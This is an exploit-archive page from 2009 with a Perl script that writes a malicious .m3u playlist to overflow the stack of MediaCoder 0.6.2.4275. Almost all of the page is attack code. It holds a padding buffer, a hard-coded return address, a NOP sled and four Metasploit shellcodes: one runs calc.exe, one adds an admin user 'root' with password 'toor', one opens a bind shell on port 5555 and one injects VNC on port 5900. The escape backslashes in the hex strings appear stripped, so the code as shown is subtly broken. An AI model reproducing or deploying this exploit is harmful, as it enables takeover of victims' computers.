[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit
# Published : 2009-03-09
# Author : Stack
# Previous Title : RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit
# Next Title : MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
#!/usr/bin/perl
# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
# By Stack
# Mountassif Moad
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
my $header= "x23x45x58x54x4Dx33x55x0Dx0Ax23x45x58x54x49x4Ex46".
"x3Ax33x3Ax35x30x2Cx4Cx61x6Dx62x20x4Fx66x20x47x6F".
"x64x20x2Dx20x53x65x74x20x54x6Fx20x46x61x69x6Cx20".
"x0Dx0Ax44x3Ax5C";
my $junk = "x41" x 254;
my $ret = "x93x43x92x7c"; # Universal return adress :d
my $nop = "x90" x 25;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x50x42x50x42x30x4bx48x45x34x4ex43x4bx38x4ex47".
"x45x30x4ax57x41x30x4fx4ex4bx48x4fx34x4ax51x4bx48".
"x4fx55x42x52x41x50x4bx4ex49x34x4bx48x46x53x4bx48".
"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x52x46x30x45x37x45x4ex4bx38".
"x4fx45x46x32x41x30x4bx4ex48x56x4bx38x4ex50x4bx54".
"x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex41x4bx58".
"x41x50x4bx4ex49x48x4ex45x46x42x46x30x43x4cx41x43".
"x42x4cx46x36x4bx58x42x34x42x33x45x48x42x4cx4ax57".
"x4ex30x4bx48x42x44x4ex30x4bx48x42x47x4ex41x4dx4a".
"x4bx48x4ax46x4ax50x4bx4ex49x30x4bx58x42x38x42x4b".
"x42x50x42x50x42x30x4bx48x4ax36x4ex53x4fx45x41x33".
"x48x4fx42x36x48x45x49x48x4ax4fx43x38x42x4cx4bx47".
"x42x55x4ax46x42x4fx4cx38x46x50x4fx55x4ax36x4ax39".
"x50x4fx4cx38x50x50x47x45x4fx4fx47x4ex43x36x41x36".
"x4ex56x43x36x50x32x45x36x4ax57x45x56x42x30x5a";
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
my $adduser_shell =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x30x42x50x4bx58x45x54x4ex43x4bx58x4ex37".
"x45x50x4ax37x41x30x4fx4ex4bx58x4fx44x4ax31x4bx48".
"x4fx55x42x32x41x30x4bx4ex49x44x4bx38x46x43x4bx58".
"x41x50x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x45x46x52x46x30x45x47x45x4ex4bx58".
"x4fx35x46x52x41x30x4bx4ex48x46x4bx38x4ex30x4bx54".
"x4bx58x4fx35x4ex31x41x30x4bx4ex4bx58x4ex41x4bx38".
"x41x50x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53".
"x42x4cx46x46x4bx48x42x54x42x53x45x38x42x4cx4ax37".
"x4ex30x4bx48x42x34x4ex30x4bx58x42x47x4ex51x4dx4a".
"x4bx48x4ax36x4ax30x4bx4ex49x30x4bx48x42x48x42x4b".
"x42x30x42x50x42x50x4bx58x4ax46x4ex43x4fx35x41x53".
"x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx57".
"x42x45x4ax56x42x4fx4cx58x46x50x4fx35x4ax56x4ax49".
"x50x4fx4cx48x50x50x47x55x4fx4fx47x4ex43x36x4dx46".
"x46x36x50x52x45x56x4ax57x45x36x42x52x4fx42x43x56".
"x42x42x50x56x45x36x46x37x42x52x45x37x43x47x45x46".
"x44x57x42x52x44x57x4fx56x4fx56x46x37x42x42x46x57".
"x4fx46x4fx46x44x37x42x42x4fx52x41x44x46x34x46x34".
"x42x42x48x32x48x52x42x32x50x36x45x46x46x47x42x42".
"x4ex56x4fx56x43x46x41x56x4ex46x47x36x44x37x4fx56".
"x45x47x42x57x42x42x41x44x46x36x4dx46x49x46x50x56".
"x49x36x43x57x46x37x44x37x41x56x46x37x4fx46x44x57".
"x43x47x42x32x44x57x4fx56x4fx56x46x47x42x32x4fx32".
"x41x44x46x44x46x34x42x50x5a";
# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $bind_shell =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e".
"x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38".
"x4ex46x46x42x46x32x4bx48x45x54x4ex53x4bx58x4ex47".
"x45x30x4ax57x41x30x4fx4ex4bx48x4fx34x4ax31x4bx58".
"x4fx55x42x42x41x50x4bx4ex49x54x4bx38x46x53x4bx38".
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x52x4ax52x45x37x45x4ex4bx48".
"x4fx45x46x42x41x30x4bx4ex48x36x4bx38x4ex50x4bx34".
"x4bx48x4fx35x4ex41x41x30x4bx4ex43x50x4ex32x4bx38".
"x49x58x4ex56x46x42x4ex41x41x56x43x4cx41x53x4bx4d".
"x46x36x4bx38x43x34x42x53x4bx58x42x34x4ex30x4bx48".
"x42x47x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax56".
"x50x58x50x44x50x30x4ex4ex42x35x4fx4fx48x4dx48x56".
"x43x35x48x46x4ax46x43x43x44x53x4ax36x47x37x43x47".
"x44x33x4fx45x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e".
"x4ex4fx4bx53x42x45x4fx4fx48x4dx4fx45x49x58x45x4e".
"x48x46x41x38x4dx4ex4ax50x44x30x45x35x4cx46x44x30".
"x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x45".
"x4fx4fx48x4dx43x55x43x35x43x45x43x55x43x55x43x34".
"x43x45x43x54x43x35x4fx4fx42x4dx48x36x4ax36x45x41".
"x43x4bx48x36x43x45x49x38x41x4ex45x49x4ax56x46x4a".
"x4cx41x42x57x47x4cx47x45x4fx4fx48x4dx4cx46x42x41".
"x41x55x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52".
"x49x4ex47x35x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d".
"x4ax36x45x4ex49x44x48x58x49x44x47x45x4fx4fx48x4d".
"x42x45x46x35x46x55x45x35x4fx4fx42x4dx43x39x4ax46".
"x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x36x4cx46x46x36x48x36x4ax56x43x36".
"x4dx36x49x58x45x4ex4cx56x42x55x49x35x49x52x4ex4c".
"x49x58x47x4ex4cx36x46x34x49x48x44x4ex41x43x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x54x4ex32".
"x43x39x4dx38x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax56".
"x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f".
"x48x4dx4bx35x47x35x44x45x41x55x41x35x41x55x4cx36".
"x41x30x41x55x41x35x45x35x41x45x4fx4fx42x4dx4ax46".
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx46".
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4f".
"x43x38x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d".
"x4ax56x42x4fx4cx58x46x30x4fx55x43x35x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
my $bind_vncinject =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ax4ex48x55x42x50".
"x42x30x42x30x43x55x45x35x48x45x47x45x4bx38x4ex36".
"x46x42x4ax31x4bx38x45x54x4ex33x4bx48x46x55x45x30".
"x4ax47x41x50x4cx4ex4bx58x4cx54x4ax31x4bx48x4cx55".
"x42x42x41x50x4bx4ex43x4ex44x43x49x54x4bx58x46x33".
"x4bx48x41x30x50x4ex41x33x4fx4fx4ex4fx41x43x42x4c".
"x4ex4ax4ax53x42x4ex46x57x47x30x41x4cx4fx4cx4dx30".
"x41x30x47x4cx4bx4ex44x4fx4bx33x4ex47x46x42x46x51".
"x45x37x41x4ex4bx38x4cx35x46x52x41x30x4bx4ex48x56".
"x4bx58x4ex50x4bx54x4bx48x4cx55x4ex51x41x30x4bx4e".
"x4bx58x46x30x4bx58x41x50x4ax4ex4bx4ex44x50x41x43".
"x42x4cx4fx35x50x35x4dx35x4bx45x44x4cx4ax50x42x50".
"x50x55x4cx36x42x33x49x55x46x46x4bx58x49x31x4bx38".
"x4bx45x4ex50x4bx38x4bx35x4ex31x4bx48x4bx51x4bx58".
"x4bx45x4ax30x43x55x4ax56x50x38x50x34x50x50x4ex4e".
"x4fx4fx48x4dx49x48x47x4cx41x58x4ex4ex42x50x41x50".
"x42x50x42x30x47x45x48x55x43x45x49x38x45x4ex4ax4e".
"x47x52x42x30x42x30x42x30x42x59x41x50x42x30x42x50".
"x48x4bx49x51x4ax51x47x4ex46x4ax49x31x42x47x49x4e".
"x45x4ex49x54x48x58x49x54x46x4ax4cx51x42x37x47x4c".
"x46x4ax4dx4ax50x42x49x4ex49x4dx49x50x45x4fx4dx4a".
"x4bx4cx4dx4ex4ex4fx4bx43x47x45x43x35x44x33x4fx45".
"x43x33x44x43x42x30x4bx45x4dx38x4bx34x42x42x41x55".
"x4fx4fx47x4dx49x58x4fx4dx49x38x43x4cx4dx58x45x47".
"x46x41x4cx36x47x30x49x45x41x35x43x45x4fx4fx46x43".
"x4fx38x4fx4fx45x35x46x50x49x35x49x58x46x50x50x48".
"x44x4ex44x4fx4bx32x47x52x46x35x4fx4fx47x43x4fx4f".
"x45x35x42x43x41x53x42x4cx42x45x42x35x42x35x42x55".
"x42x54x42x55x42x44x42x35x4fx4fx45x45x4ex32x49x48".
"x47x4cx41x53x4bx4dx43x45x43x45x4ax46x44x30x42x50".
"x41x31x4ex55x49x48x42x4ex4cx36x42x31x42x35x47x55".
"x4fx4fx45x35x46x32x43x55x47x45x4fx4fx45x45x4ax32".
"x43x55x46x35x47x45x4fx4fx45x55x42x32x49x48x47x4c".
"x41x58x4ex4ex42x50x42x31x42x50x42x50x49x58x43x4e".
"x4cx46x42x50x4ax46x42x30x42x51x42x30x42x30x43x35".
"x47x45x4fx4fx45x35x4ax31x41x58x4ex4ex42x30x46x30".
"x42x30x42x30x4fx4fx43x4dx5a";
$id = $ARGV[0];
if ($id==1){
print "$header.$junk.$ret.$nop.$calc_shell.$nop";
exit;
}
if ($id==2){
print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
exit;
}
if ($id==3){
print "$header.$junk.$ret.$nop.$bind_shell.$nop";
exit;
}
if ($id==4){
print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
exit;
}
print "n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print " +++ +++n";
print " +++ +++n";
print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow +++n";
print " +++ Written By Stack +++n";
print " +++ +++n";
print " +++ Usage Ex.: perl $0 1 >>Exploit.m3u +++n";
print " +++ +++n";
print " +++ Options: +++n";
print " +++ 1 - win32_exec calc.exe +++n";
print " +++ 2 - win32_adduser Pass=toor User=root +++n";
print " +++ 3 - win32_bind Port 5555 +++n";
print " +++ 4 - win32_bind_vncinject Port 5900 +++n";
print " +++ +++n";
print " +++ +++n";
print " +++ +++n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
exit;
#EOF
# www.Syue.com [2009-03-09]